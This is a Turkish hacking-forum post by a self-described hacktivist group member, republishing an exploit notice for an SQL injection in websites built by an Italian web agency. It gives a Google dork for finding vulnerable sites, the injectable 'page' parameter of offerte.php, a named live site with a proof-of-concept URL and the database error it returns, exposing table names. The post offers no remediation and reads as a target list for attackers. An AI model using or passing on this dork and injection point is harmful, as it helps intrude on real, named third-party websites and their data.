Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Amaka Web Agency e Posizionamento Siti SQL Inj Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2742
Mesaj Sayısı: 6282
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Amaka Web Agency e Posizionamento Siti SQL Inj Vuln
18.09.2018 22:43
################################################################################​#################

# Exploit Title : Sito Creato Da Amaka Web Agency e Posizionamento Siti SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : amaka.it
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:''sito creato da Amaka web agency e posizionamento siti''

# Exploit :

/offerte.php?catid=[ID-NUMBER]&page=[SQL Injection]

################################################################################​#################

# Example Site => reggiogas.it/offerte.php?catid=3&page=9%27 => [ Proof of Concept ] => archive.is/kMm4o

# SQL Database Error =>

mySQL error with query SELECT i.inumber as itemid, i.ititle as title, i.ibody as body, m.mname as author, m.mrealname as authorname,
UNIX_TIMESTAMP(i.itime) as timestamp, i.itime, i.imore as more, m.mnumber as authorid, c.cname as category, i.icat as catid,
i.iclosed as closed FROM nucleus_member as m, nucleus_category as c, nucleus_item as i WHERE i.iauthor = m.mnumber
AND i.icat = c.catid AND i.idraft = 0 AND i.iblog = 2 AND i.itime <= "2018-09-18 21:25:22" AND i.icat=3 ORDER BY i.itime DESC LIMIT -9, 1:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-9, 1' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi